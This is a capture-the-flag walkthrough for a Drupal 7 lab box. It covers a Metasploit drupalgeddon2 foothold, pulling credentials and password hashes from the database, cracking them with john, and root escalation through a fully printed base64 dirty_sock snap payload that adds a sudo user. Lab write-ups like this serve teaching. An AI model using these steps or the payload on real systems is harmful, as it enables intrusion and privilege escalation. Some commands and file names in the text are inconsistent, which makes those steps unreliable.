Enumeration
The start step for this box is as usual. I am using nmap to check which ports are open and what services are there.
As it can be seen from the picture above there are two ports open. My method is to start on port 80. From the scan results it can be seen that there is an Apache server that runs and Drupal version 7. Also we ca see several file locations. That is a lot of information from a single scan.
Foothold
After some googling I found that Drupal 7 can be exploited with a metasploit module. That is awesome! The module that needs to be used can be found below plus here is a link to Rapid 7.
use exploit/unix/webapp/drupal_drupalgeddon2The set up I will leave to you because it is something that you need to be able to figure out.
USER:
After I got the shell I started browsing around and see what is available. My main rule is check the dir that the shell is spawned in. If there is nothing interesting more around.
In the /var/www/html/sites/default/ there was something interesting. I will leave that to you as well, because I think it is important to learn how to read different files and find the useful information, however I will say that one of the files has some credentials in it. Find them and put them in to your notes.
Time to test the credentials. They are used to connect to the database of course. I will post the command below, however the username and password will not be shown. This is the credentials you discovered earlier.
mysql -u ********** -p********** -e 'show databases;'
The -u is for username and -p is for the password. To see the available tables, modify the previous command and instead of 'show tabases;' you used 'show tables;'. The next step is to drop the “users” table. The command is as shown below.
mysql -u ******** -p******** -D drupal -e 'select name,pass from users;'
This will give you some hashes. I focused on one of them, but you can try both. The process for the hashes is simple. Put the hash in a text file and use john to crack it. The command can be found below, where hash is the text file containing the hash.
john hash -w=/usr/share/wordlists/rockyou.txt
When this is done you are ready to get the user flag. Just ssh to the machine using the username and the cracked password. Here you go. You can see user.txt
If there is any questions or you get stuck join our Discord.
ROOT:
Time to escalate privileges. First check what can be ran as sudo.
I researched how to privilege escalate and what I found is a script called dirty_sockv2.py. The link to the github repo can be found here. In our case however the skript will not work, but we can use a part of it. We need the base64 part of it. I will post the whole command and if you are interested to see where it comes from check the repo. Do the command on the target machine:
python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256 + "=="' | base64 -d > filename.snap
Now run the snap file with:
sudo /usr/bin/snap install --devmode luci.snap
The only thing left is to switch user. The user name and password that should be used is dirty_sock. If you don’t know how to switch users read this. After all is done go and get you a root flag.
Conclusion:
Thank you for reading the write up. If you get stuck somewhere please leave a comment and I will try to point you in the right direction.
